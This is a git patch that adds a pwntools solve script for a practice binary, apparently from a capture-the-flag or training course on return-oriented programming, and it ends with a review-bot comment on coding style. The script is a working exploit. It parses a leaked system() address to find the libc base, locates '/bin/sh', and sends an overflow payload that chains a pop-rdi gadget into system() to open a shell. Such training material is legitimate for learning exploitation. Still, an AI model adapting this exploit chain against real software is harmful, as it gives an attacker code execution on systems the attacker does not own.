From 01d5e474598df926b896ddeb925cb5333b6d2a6c Mon Sep 17 00:00:00 2001
From: jc
Date: Wed, 6 Aug 2025 19:10:38 +0300
Subject: [PATCH] solve script

---
 weiss_overlude/babyrop_level_7.0/a.py | 35 +++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 weiss_overlude/babyrop_level_7.0/a.py

diff --git a/weiss_overlude/babyrop_level_7.0/a.py b/weiss_overlude/babyrop_level_7.0/a.py
new file mode 100644
index 0000000..8cd87b5
--- /dev/null
+++ b/weiss_overlude/babyrop_level_7.0/a.py
@@ -0,0 +1,35 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_7_0
+"""
+
+context.binary = target = ELF("./babyrop_level_7_0", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x402883
+
+# buf
+r.recvuntil(b"[LEAK]")
+system = int(re.findall(r'0x[a-z0-9]+', r.recvlineS())[0], 16)
+log.info("system: %#x", system)
+libc.address = system - libc.sym.system
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+
+# pop
+buf = b"A"*88
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file
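Review bot: The triple-quoted patchelf note near the top of the new file is a bare string expression rather than a module docstring, because it sits after `from pwn import *`; a `#` comment (or placing it above the import) would make it read as the setup note it is. The `re.findall` call on the `[LEAK]` line relies on `re` being re-exported by the star import instead of an explicit `import re`, which hides the dependency from readers and linters and breaks if the star-import surface changes. The file also carries a `#!/usr/bin/python3` shebang but is added with mode 100644, so it is not directly executable as committed.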